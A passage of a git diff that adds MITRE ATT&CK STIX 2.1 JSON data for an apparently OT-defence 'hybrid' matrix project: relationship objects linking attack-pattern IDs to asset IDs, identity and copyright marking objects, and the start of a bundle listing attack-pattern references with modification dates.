"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff171c46-cbf0-4b24-a4d3-db15df1d88f2", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff2155fa-714d-4d99-a610-91ceb5f049ef", + "created": "2020-03-11T14:28:40.164Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff38c15c-1d1f-4095-8da6-e2709a79d84a", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff735817-537a-411c-827f-8f5fbdd296c6", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff7a34c8-adeb-4f1d-904d-e41355d8b7d6", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff847291-0fdb-4e3e-85ea-81b5618d9a86", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff8aa165-9bf6-4735-8848-c2e529c5a210", + "created": "2024-06-26T11:55:01.411Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:55:01.411Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff8bf24d-16ed-4f45-84f1-abc2dbcc7c65", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff90f6fd-da97-4be6-a99d-efaba9fdf508", + "created": "2024-06-27T08:55:41.516Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:55:41.516Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff926e60-3e81-40fc-a804-86af63207c89", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ff99df76-7e63-4162-b27e-95c6bed9a251", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ffaf12af-7f0f-450e-b461-6eb3b26d0acc", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ffb5d378-3985-48c1-9ad4-3542aa6eeeac", + "created": "2024-06-27T09:02:38.125Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:02:38.125Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ffc224ed-0a20-435a-b145-4df111b09a37", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ffd69fbd-738f-4025-8f99-cfe13dcf6769", + "created": "2024-06-26T13:50:18.323Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:50:18.323Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ffea22f5-2758-4e94-a00e-bfd8696ce2db", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fff40673-b638-4695-9054-bab46559c992", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "The MITRE Corporation", + "roles": [], + "identity_class": "organization", + "sectors": [], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "identity", + "spec_version": "2.1", + "id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-06-01T00:00:00.000Z", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-27T15:31:28.155Z", + "name": "Placeholder Organization Identity", + "description": "This is a placeholder organization identity. Please edit it or replace it with another identity.", + "roles": [], + "identity_class": "organization", + "sectors": [], + "x_mitre_attack_spec_version": "3.1.0", + "type": "identity", + "spec_version": "2.1", + "id": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "created": "2023-09-27T15:31:28.155Z", + "external_references": [], + "object_marking_refs": [] + }, + { + "modified": "2024-06-24T11:37:06.994Z", + "name": "Placeholder Organization Identity", + "description": "This is a placeholder organization identity. Please edit it or replace it with another identity.", + "roles": [], + "identity_class": "organization", + "sectors": [], + "x_mitre_attack_spec_version": "3.2.0", + "type": "identity", + "spec_version": "2.1", + "id": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "created": "2024-06-24T11:37:06.994Z", + "external_references": [], + "object_marking_refs": [] + }, + { + "definition": { + "statement": "Copyright 2015-2024, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0", + "type": "marking-definition", + "spec_version": "2.1", + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [] + } + ] +} \ No newline at end of file diff --git a/docs/extra/hybrid_att&ck_matrix.xlsx b/docs/extra/hybrid_att&ck_matrix.xlsx new file mode 100644 index 0000000..3c653c6 Binary files /dev/null and b/docs/extra/hybrid_att&ck_matrix.xlsx differ diff --git a/docs/extra/modified_work_bench_file.json b/docs/extra/modified_work_bench_file.json new file mode 100644 index 0000000..cae111d --- /dev/null +++ b/docs/extra/modified_work_bench_file.json @@ -0,0 +1 @@ +{"type": "bundle", "id": "bundle--544f68d8-c53a-4d06-b0a1-5f1d4ca8200d", "objects": [{"modified": "2024-05-31T17:44:37.258Z", "name": "defending-ot with att&ck-0.1", "description": "defending-ot with att&ck-0.1 - With Router Asset Updates", "x_mitre_contents": [{"object_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "object_modified": "2024-05-21T16:23:41.133Z"}, {"object_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "object_modified": "2023-11-15T14:33:53.354Z"}, {"object_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "object_modified": "2024-05-21T16:22:21.025Z"}, {"object_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", "object_modified": "2023-10-13T17:56:58.380Z"}, {"object_ref": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", "object_modified": "2023-09-15T19:02:53.995Z"}, {"object_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", "object_modified": "2024-04-11T18:13:25.130Z"}, {"object_ref": "attack-pattern--01df3350-ce05-4bdf-bdf8-0a919a66d4a8", "object_modified": "2023-10-15T20:24:13.473Z"}, {"object_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", "object_modified": "2023-03-30T21:01:39.967Z"}, {"object_ref": "attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", "object_modified": "2024-04-16T12:23:13.621Z"}, {"object_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", "object_modified": "2024-04-18T14:26:21.852Z"}, {"object_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "object_modified": "2023-09-29T19:50:06.736Z"}, {"object_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "object_modified": "2024-02-28T21:13:02.648Z"}, {"object_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", "object_modified": "2023-08-14T15:35:28.965Z"}, {"object_ref": "attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", "object_modified": "2022-10-20T21:20:22.578Z"}, {"object_ref": "attack-pattern--04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--04ef4356-8926-45e2-9441-634b6f3dcecb", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", "object_modified": "2023-03-03T00:31:33.071Z"}, {"object_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", "object_modified": "2023-09-29T21:14:57.263Z"}, {"object_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "object_modified": "2023-10-13T17:56:58.586Z"}, {"object_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--086952c4-5b90-4185-b573-02bad8e11953", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", "object_modified": "2023-10-13T17:56:58.786Z"}, {"object_ref": "attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", "object_modified": "2023-10-01T14:01:12.167Z"}, {"object_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", "object_modified": "2023-10-13T17:56:58.991Z"}, {"object_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", "object_modified": "2024-04-15T23:42:39.831Z"}, {"object_ref": "attack-pattern--09b130a2-a77e-4af0-a361-f46f9aad1345", "object_modified": "2023-08-14T17:54:22.970Z"}, {"object_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", "object_modified": "2023-10-16T16:57:41.743Z"}, {"object_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "object_modified": "2024-04-18T23:47:41.667Z"}, {"object_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", "object_modified": "2023-10-12T21:17:14.868Z"}, {"object_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32", "object_modified": "2023-10-03T03:29:57.078Z"}, {"object_ref": "attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0c8ab3eb-df48-4b9c-ace7-beacaac81cc5", "object_modified": "2024-04-16T12:25:24.480Z"}, {"object_ref": "attack-pattern--0ca7beef-9bbc-4e35-97cf-437384ddce6a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0cc222f5-c3ff-48e6-9f52-3314baf9d37e", "object_modified": "2024-04-15T23:49:14.558Z"}, {"object_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", "object_modified": "2023-10-16T16:41:53.957Z"}, {"object_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", "object_modified": "2024-04-19T04:03:07.164Z"}, {"object_ref": "attack-pattern--0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0dda99f0-4701-48ca-9774-8504922e92d3", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", "object_modified": "2023-10-20T17:04:13.976Z"}, {"object_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", "object_modified": "2023-10-13T17:56:59.193Z"}, {"object_ref": "attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea", "object_modified": "2022-10-21T14:32:48.393Z"}, {"object_ref": "attack-pattern--0fff2797-19cb-41ea-a5f1-8a9303b8158e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--101c3a64-9ba5-46c9-b573-5c501053cbca", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "object_modified": "2024-01-23T22:53:18.389Z"}, {"object_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", "object_modified": "2024-02-15T14:14:03.942Z"}, {"object_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", "object_modified": "2024-04-16T12:56:56.861Z"}, {"object_ref": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", "object_modified": "2023-10-13T17:56:59.396Z"}, {"object_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "object_modified": "2021-04-29T14:49:39.188Z"}, {"object_ref": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", "object_modified": "2023-09-05T20:45:22.041Z"}, {"object_ref": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", "object_modified": "2024-04-19T12:24:40.659Z"}, {"object_ref": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", "object_modified": "2023-04-17T15:32:39.470Z"}, {"object_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "object_modified": "2023-09-29T21:06:03.098Z"}, {"object_ref": "attack-pattern--1644e709-12d2-41e5-a60f-3470991f5011", "object_modified": "2023-07-24T18:53:10.860Z"}, {"object_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "object_modified": "2024-04-16T12:21:51.311Z"}, {"object_ref": "attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "object_modified": "2023-10-31T14:00:00.188Z"}, {"object_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", "object_modified": "2022-05-11T14:00:00.188Z"}, {"object_ref": "attack-pattern--18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", "object_modified": "2024-04-13T14:47:31.204Z"}, {"object_ref": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", "object_modified": "2023-12-26T20:54:38.721Z"}, {"object_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "object_modified": "2023-10-13T17:56:59.593Z"}, {"object_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", "object_modified": "2023-03-21T13:56:27.910Z"}, {"object_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "object_modified": "2024-03-29T16:37:34.772Z"}, {"object_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", "object_modified": "2023-10-13T17:56:59.793Z"}, {"object_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", "object_modified": "2023-05-09T14:00:00.188Z"}, {"object_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "object_modified": "2023-10-13T17:56:59.992Z"}, {"object_ref": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "object_modified": "2023-03-30T21:01:47.417Z"}, {"object_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "object_modified": "2022-04-25T14:00:00.188Z"}, {"object_ref": 